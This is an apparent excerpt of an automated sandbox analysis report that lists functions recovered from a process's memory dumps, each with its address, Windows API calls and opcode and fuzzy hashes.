                                                • Instruction ID: ce2e83ed74172add1c775a6a3a5a1dd57a73a367668df4fa33489c75fe55c8d9
                                                • Opcode Fuzzy Hash: 3f6d1bb88e5446bb06ef4cbb522ce03b12a453c4557f5b28ab246edc9cb2be09
                                                • Instruction Fuzzy Hash: 67222874A04229CFCB64EF74C9887ADB7B6AF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A47117, Relevance: 1.9, APIs: 1, Instructions: 441libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0cf844dc4a5202208759474db22ac5b457d5a3e682b6f7a7b0b5bbb62f29d726
                                                • Instruction ID: b2c8fa401a2cc731a39079b42682236c0cc685e61b857fb60ffc266314e19a40
                                                • Opcode Fuzzy Hash: 0cf844dc4a5202208759474db22ac5b457d5a3e682b6f7a7b0b5bbb62f29d726
                                                • Instruction Fuzzy Hash: 2A122874A042288FCB64DF74C8887ADBBB6BF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A47177, Relevance: 1.9, APIs: 1, Instructions: 430libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ba052eb4304a2f5a6e2c90b6f253ba36b40bc91d2f308b509adfd214de08b186
                                                • Instruction ID: b11512f10091acdb0270c5488ac2f60b458e38c755ad7a55851dacbec35c2ec9
                                                • Opcode Fuzzy Hash: ba052eb4304a2f5a6e2c90b6f253ba36b40bc91d2f308b509adfd214de08b186
                                                • Instruction Fuzzy Hash: D3121974A042298FCB64DF74C9887ADBBB6AF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A471C1, Relevance: 1.9, APIs: 1, Instructions: 423libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8e197856c5e71bf6e790d14c77c10bc30afa6995a0ded2819fefceaaf9ea261b
                                                • Instruction ID: d9bef10548d26f5815ad9c74cd37649b27171437fbfca265b64d1c5f2b994339
                                                • Opcode Fuzzy Hash: 8e197856c5e71bf6e790d14c77c10bc30afa6995a0ded2819fefceaaf9ea261b
                                                • Instruction Fuzzy Hash: B1121A74A04229CFCB64DF74C9887ADBBB6AF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A4720B, Relevance: 1.9, APIs: 1, Instructions: 416libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9b9954c3723d67db82aeba6bc58a006577ba3288d30d24fcc5ec778b14ed5cb2
                                                • Instruction ID: 5361a8fb6a8303a6682ff102991114c4920f7c3efcc3fa946e9ead7f860dcc8a
                                                • Opcode Fuzzy Hash: 9b9954c3723d67db82aeba6bc58a006577ba3288d30d24fcc5ec778b14ed5cb2
                                                • Instruction Fuzzy Hash: 14122A74A042298FCB64DF74C9887ADBBB6AF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A47255, Relevance: 1.9, APIs: 1, Instructions: 409libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34c7c407206eb512288a3b42e708acc549ccfcfbee41a94277a12573e3d114a1
                                                • Instruction ID: 53057b26cc613aa18737458700a43c11d9d81888c6ebb039e140d1b899053778
                                                • Opcode Fuzzy Hash: 34c7c407206eb512288a3b42e708acc549ccfcfbee41a94277a12573e3d114a1
                                                • Instruction Fuzzy Hash: 74023974A042298FCB64DF74C9887ADBBB6BF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A4729F, Relevance: 1.9, APIs: 1, Instructions: 402libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 578ea7c00a26af759f1675fa6ce413971048a8f9facfaa9f0d1033addf08efa4
                                                • Instruction ID: 6bdbc7a53d4d4023b1aa1bd232bb88ec0db6064c001b12331219170a1020619d
                                                • Opcode Fuzzy Hash: 578ea7c00a26af759f1675fa6ce413971048a8f9facfaa9f0d1033addf08efa4
                                                • Instruction Fuzzy Hash: CB023B74A042298FCB64DF74C9887ADBBB6BF88305F6084E9D50AA3341DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A472E9, Relevance: 1.9, APIs: 1, Instructions: 395libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 238637a793566e808874ba95aab209c6ab237beb903b5f37bf296e2b78955827
                                                • Instruction ID: c2a9d6c12c97660880598b64dd13e465f037757dd131dafd3b36dbb915a77710
                                                • Opcode Fuzzy Hash: 238637a793566e808874ba95aab209c6ab237beb903b5f37bf296e2b78955827
                                                • Instruction Fuzzy Hash: BE023C74A042248FDB64DF74C9887ADBBB6BF88305F6084E9D50AA3341DB349D86CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A47333, Relevance: 1.9, APIs: 1, Instructions: 386libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734539418.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6a76643689d838c848ef071680286acbd8c6d45c5e2baeefff5c76feaeacb0d5
                                                • Instruction ID: 4646701a1c2d98b6dad64dc15c0fc56cc9248c4ad02721c8e93b049ffbaf0f48
                                                • Opcode Fuzzy Hash: 6a76643689d838c848ef071680286acbd8c6d45c5e2baeefff5c76feaeacb0d5
                                                • Instruction Fuzzy Hash: A9024B74A042248FDB64EF74C9887ADBBB6BF88305F6084E9D50AA3341DB348D86CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB14FF0, Relevance: 1.8, APIs: 1, Instructions: 291COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1DB153B6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6acb05f611fc76126f15949e1c634bc7d932267749ce0fdd6b7da00034fafd23
                                                • Instruction ID: 5a7819c68c9169105336f5de6de40946a3d302c1d04384b8677004aca31680e9
                                                • Opcode Fuzzy Hash: 6acb05f611fc76126f15949e1c634bc7d932267749ce0fdd6b7da00034fafd23
                                                • Instruction Fuzzy Hash: 27B1BE74A047058FCB04DFA9D484AAEBBF6FF89614B05896DC80ADB751DB34F841CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AA2860, Relevance: 1.7, APIs: 1, Instructions: 237COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734751344.0000000000AA0000.00000040.00000010.sdmp, Offset: 00AA0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df77f2fcf26d29db8dc14d1989d38e23ee3ab8fa4fe0e79df370f4c677075804
                                                • Instruction ID: 309c79ad614fdd7f77adef636af6fe1d7ad043a0fbfe947c13f6562e08794cba
                                                • Opcode Fuzzy Hash: df77f2fcf26d29db8dc14d1989d38e23ee3ab8fa4fe0e79df370f4c677075804
                                                • Instruction Fuzzy Hash: 86919A70A00B019FD724CF6AC5407ABBBF5BF89714F04892DE446DBA90DB75E815CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00B17A4C, Relevance: 1.7, APIs: 1, Instructions: 192threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734935060.0000000000B17000.00000040.00000001.sdmp, Offset: 00B17000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: e2fd3ec643157c646bf6d4e11c75271370cc84ecc3916310c876ec826f3702e5
                                                • Instruction ID: cfd507be4d035b559387de8cff1957140f0e632d58d243099c0783c6a70d4bcb
                                                • Opcode Fuzzy Hash: e2fd3ec643157c646bf6d4e11c75271370cc84ecc3916310c876ec826f3702e5
                                                • Instruction Fuzzy Hash: 0F31D032548306CFCB248F24C8D87E677F6EF61360F9981D5D5894B2A5DB3589C5CB12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB14600, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB1690A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: e562e828b0a75af24ab2506937f9090d5ba18ded943979c2812cd7ee3a1b8b0f
                                                • Instruction ID: a4d9193e82700ca7277c9722a060a0f16dc0fbd7d5b963ec3f3aa57ca1e6e098
                                                • Opcode Fuzzy Hash: e562e828b0a75af24ab2506937f9090d5ba18ded943979c2812cd7ee3a1b8b0f
                                                • Instruction Fuzzy Hash: D95145B1C043489FCF02CFAAD890ADEBFB5BF49314F24815AE419AB251D7349984CF96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB167ED, Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB1690A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 0d36663e0482a5778dcfe949acdf44e0bbd7a2cee1010a0d5792ddfa9ac7d2f5
                                                • Instruction ID: 2c5083cd9dafd5dfce679c6c0127e1f8e2fee003ce3a3f4f9788b02761914e62
                                                • Opcode Fuzzy Hash: 0d36663e0482a5778dcfe949acdf44e0bbd7a2cee1010a0d5792ddfa9ac7d2f5
                                                • Instruction Fuzzy Hash: 9951C1B5D00209DFDF14CF99D984ADEBBB5FF88310F20812AE819AB250D774A985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB14674, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB1690A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 4a03d63254757d7eba43abb0f9a2d7eb02982f6c308fc5860315a13d9228d8c3
                                                • Instruction ID: c678860ec28ba1367585e49eccbdef9b66e66d8162b0077c0a18a3b556d37f21
                                                • Opcode Fuzzy Hash: 4a03d63254757d7eba43abb0f9a2d7eb02982f6c308fc5860315a13d9228d8c3
                                                • Instruction Fuzzy Hash: F251B0B1D00309EFDB15CF99D884ADEBBB5FF48310F20812AE819AB250D774A945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB1A144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DB1B4E1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: b12bb96299a164a5866f29553c7728d7f75c53889db41211acfff6abe5c413bd
                                                • Instruction ID: 96e8e9014ec43d34ad595a394ee785b6bd6faa532ad43cac3a0b829a844ab731
                                                • Opcode Fuzzy Hash: b12bb96299a164a5866f29553c7728d7f75c53889db41211acfff6abe5c413bd
                                                • Instruction Fuzzy Hash: B2414BB8900305CFCB10CF95D484AAABBF5FF89714F24C499D51AAB321D775A841CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB1A54A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB1A5D7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 7d2cc96acf55084a61d9e1c8f690a2817f6ae066d7953eba7c161a54b4e7124e
                                                • Instruction ID: d4ccec51cab6bd701740ce33cc94a9bc98c40eceae04ae45bbb4f3bd656a098a
                                                • Opcode Fuzzy Hash: 7d2cc96acf55084a61d9e1c8f690a2817f6ae066d7953eba7c161a54b4e7124e
                                                • Instruction Fuzzy Hash: C32105B59002089FDB00CFA9D580ADEFBF4FF48320F10841AE915A7350C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB1A550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB1A5D7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: cff4168956ab285aeb5a328478ae9da0b5eb4d452ac40ea340640c2742ed17c8
                                                • Instruction ID: 410a80515e415b7c849568fb87cf14476e81b2f12d9dcd916f27793c25551f26
                                                • Opcode Fuzzy Hash: cff4168956ab285aeb5a328478ae9da0b5eb4d452ac40ea340640c2742ed17c8
                                                • Instruction Fuzzy Hash: 9621E3B59002489FDB10CFAAD984ADEFBF8FF48320F10841AE915A7250C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AA2AA8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00AA2B1A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734751344.0000000000AA0000.00000040.00000010.sdmp, Offset: 00AA0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 3d6337d2d3d439160b25b533bdae73ceb2b51e2124389c0cf863fdfc2d9c89f0
                                                • Instruction ID: 97cc244e24fc134797797f015216646f56ab62dfa3f2b77882acf8dc4a5b927a
                                                • Opcode Fuzzy Hash: 3d6337d2d3d439160b25b533bdae73ceb2b51e2124389c0cf863fdfc2d9c89f0
                                                • Instruction Fuzzy Hash: 951103B69002499FDB10CF9AD844BDEFBF4AF89314F14842AD419A7640C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AA1D54, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00AA2B1A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734751344.0000000000AA0000.00000040.00000010.sdmp, Offset: 00AA0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 3a1cabdbb32793ab5fcacf6fa5e855f93a03acc85234847c0d92c2130d3bcf99
                                                • Instruction ID: f692b61adc5b825515fc61c24080a8374a05f3e432216ce3b4e7ad784e89905a
                                                • Opcode Fuzzy Hash: 3a1cabdbb32793ab5fcacf6fa5e855f93a03acc85234847c0d92c2130d3bcf99
                                                • Instruction Fuzzy Hash: 261103B69002499FCB20CF9AD444BDEFBF4AF89314F10842EE919A7640C3B4A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB15349, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1DB153B6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: cdf5f913358c8e7eba79b22276657f89866f8c92bb8dce296c19e909a10932d3
                                                • Instruction ID: fb0fc3ddbcfdc66492c550634fde43346417afbaa21e48c3b22de7efd8254ebd
                                                • Opcode Fuzzy Hash: cdf5f913358c8e7eba79b22276657f89866f8c92bb8dce296c19e909a10932d3
                                                • Instruction Fuzzy Hash: 2D11F3B6C006499FCB10CF9AE444ADEFBF8EF89324F10841AD45AA7600C375A545CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00B17C33, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734935060.0000000000B17000.00000040.00000001.sdmp, Offset: 00B17000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 97bf3a12892ea06ed860611d19b6d00e4339e8885b63a70ebc635f02b42fa360
                                                • Instruction ID: 38c1092e05e05464664b1861dedd2a1263bd3d3b97236779a6310b7caee9a1db
                                                • Opcode Fuzzy Hash: 97bf3a12892ea06ed860611d19b6d00e4339e8885b63a70ebc635f02b42fa360
                                                • Instruction Fuzzy Hash: 59115E31688205CFCB248B24C4D8BB977FAEF51365F9992D9D5890B1A2CB30DCC5CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DB137C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1DB153B6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746514834.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 3b8a3f4a569773098b98e7104ec3643d955d4ef8d7c3ea11adce168d85cbd8dd
                                                • Instruction ID: 4e17def8a73f20377f39ce2ca1e7b9efa5cb422af4aad74f698fdce8af095d77
                                                • Opcode Fuzzy Hash: 3b8a3f4a569773098b98e7104ec3643d955d4ef8d7c3ea11adce168d85cbd8dd
                                                • Instruction Fuzzy Hash: 6211F3B5C006498FCB10CF9AE444B9EFBF4EF89214F14841AD55ABB600C3B5A545CFA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AA5960, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00AA67C5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734751344.0000000000AA0000.00000040.00000010.sdmp, Offset: 00AA0000, based on PE: false
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 45ddb2ed4704ec132fd92d2e14fca440a767c228874c7094f71395b8059426b9
                                                • Instruction ID: f11d2a9cf61ace7f2d012f3257a6b554339339a1a6ad6c0936df67c4d4c0e129
                                                • Opcode Fuzzy Hash: 45ddb2ed4704ec132fd92d2e14fca440a767c228874c7094f71395b8059426b9
                                                • Instruction Fuzzy Hash: 071133B59002488FCB10CFA9C484BDEBBF4AB49328F14881AD518A7640C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AA6768, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00AA67C5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156734751344.0000000000AA0000.00000040.00000010.sdmp, Offset: 00AA0000, based on PE: false
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: a4003582960c58ecc8c9c9bf5493251bc6eeeb8326ac6e293b9c010bc54bacf7
                                                • Instruction ID: 1f8500563775ed70d05ea1bdf4f1f716dc3231201d39bc0f24fb411de99ba243
                                                • Opcode Fuzzy Hash: a4003582960c58ecc8c9c9bf5493251bc6eeeb8326ac6e293b9c010bc54bacf7
                                                • Instruction Fuzzy Hash: 9A1133B58002488FCB21CFA9D444BDEBBF4AF89324F24885AD458A7A50C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E24EB0, Relevance: .6, Instructions: 584COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b7d2639fe7f2e335c17ab9ad89903dfb3318a5cbac762dd3196ceb92dcd5353
                                                • Instruction ID: daf7d6144c873f0f6eefd65ce510826076e66e8655ea87300c39e27a03d345c9
                                                • Opcode Fuzzy Hash: 0b7d2639fe7f2e335c17ab9ad89903dfb3318a5cbac762dd3196ceb92dcd5353
                                                • Instruction Fuzzy Hash: BF228135A016188FCB04DFB8DA946AD7BF2FF88304F248869E405EB355DB359D46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E2AC08, Relevance: .5, Instructions: 463COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7144d41d0421b54c29db25ac0ce7ce47de845e18d884185cb576dfd6e9c21c4
                                                • Instruction ID: bb68019bf268e547a0d174d352e21b0beb911e0405bea8d9e2a1086aa13013ed
                                                • Opcode Fuzzy Hash: c7144d41d0421b54c29db25ac0ce7ce47de845e18d884185cb576dfd6e9c21c4
                                                • Instruction Fuzzy Hash: 4E02E330B042148FDB15DB78D4947AEBBF2AF84318F2881A9D505EB3A6DB75DC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E29C58, Relevance: .3, Instructions: 332COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 297ddd3952efdf12749841ee9cc2a6d89e5540bf2bd676fa4e1c469ec0f8eb66
                                                • Instruction ID: c2e00cc621c0e081ab26145cf3a153ce801645db7a24f4a539b7ee0cdaf117af
                                                • Opcode Fuzzy Hash: 297ddd3952efdf12749841ee9cc2a6d89e5540bf2bd676fa4e1c469ec0f8eb66
                                                • Instruction Fuzzy Hash: 7FC11330B052248FDB04DF74D9946AE7BF2AF88304F2594A9E506EB392DB35DC06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E29138, Relevance: .3, Instructions: 273COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: daea90cfa4ee4858b41e644e55bfd49551765f77138ff76f0a996a5fec426d1c
                                                • Instruction ID: 462effc801d4281a9a80fdc335389512c8b507b570e4a60db712d00ab4be27e3
                                                • Opcode Fuzzy Hash: daea90cfa4ee4858b41e644e55bfd49551765f77138ff76f0a996a5fec426d1c
                                                • Instruction Fuzzy Hash: 78A19E34B002249FDB04EBB4D999B7E77B2AF84324F109628E526AB3D5DF759C02CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E277B8, Relevance: .2, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbe076900d3ec2fa441d64d9dffcfda34470fef331b0f6d6929a66dffd48dc6a
                                                • Instruction ID: 17f4d651e9d7a49bf9bc979caef8b7c986358b13944a866c3cd0941c5a99ed3f
                                                • Opcode Fuzzy Hash: fbe076900d3ec2fa441d64d9dffcfda34470fef331b0f6d6929a66dffd48dc6a
                                                • Instruction Fuzzy Hash: 8651D420B0D7D04FD702D7B8A8555AE7FF1AF86304B2590EBD488DB2A3DA25DC0AC752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E28518, Relevance: .2, Instructions: 160COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98353a81270aa4a2c3ae48e8d254552b609b02f87f7e1075ef060001205426af
                                                • Instruction ID: e3b533729011365ef0151e9e9dad7bf6ba4548e6aad1bf2a797cd591942a1f64
                                                • Opcode Fuzzy Hash: 98353a81270aa4a2c3ae48e8d254552b609b02f87f7e1075ef060001205426af
                                                • Instruction Fuzzy Hash: 2E510031B066208FD710DB78CA547ADBBE2AF89304F298479D519EB7A2CF75DC018792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E29BFA, Relevance: .1, Instructions: 142COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f20a19639d4ff5371fbec6c421c6d8a5b32cda707f1b6c662cb5559c2f3f152
                                                • Instruction ID: 7b03437da05dbca87c187ef641a8597e4d5f654c5c333783ba913b75610e2405
                                                • Opcode Fuzzy Hash: 9f20a19639d4ff5371fbec6c421c6d8a5b32cda707f1b6c662cb5559c2f3f152
                                                • Instruction Fuzzy Hash: 1651D230B042148FDB41DB78DA856AEBBF2EF85304F1590A9D505EB346EB34DC06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E279C9, Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 836b57fb00a218ddb847449c1b977c4720e4b2f02e032cdfdb23223616409faa
                                                • Instruction ID: 18c373c48d3c7ba136df1542496f7458ce7daeb2d6f91fc3e2e84cbc508bcece
                                                • Opcode Fuzzy Hash: 836b57fb00a218ddb847449c1b977c4720e4b2f02e032cdfdb23223616409faa
                                                • Instruction Fuzzy Hash: 6A313835B0D2604FCB01DBF8E8556DE7BF1EBC4394B1184A6D445EB2A2DA349C06C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E25F49, Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
